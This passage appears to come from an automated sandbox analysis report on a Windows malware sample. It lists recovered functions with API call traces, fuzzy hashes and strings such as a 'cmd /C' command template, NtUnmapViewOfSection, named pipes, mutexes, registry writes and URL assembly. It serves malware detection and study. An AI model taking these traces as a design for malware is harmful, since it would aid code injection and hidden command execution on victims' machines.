    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
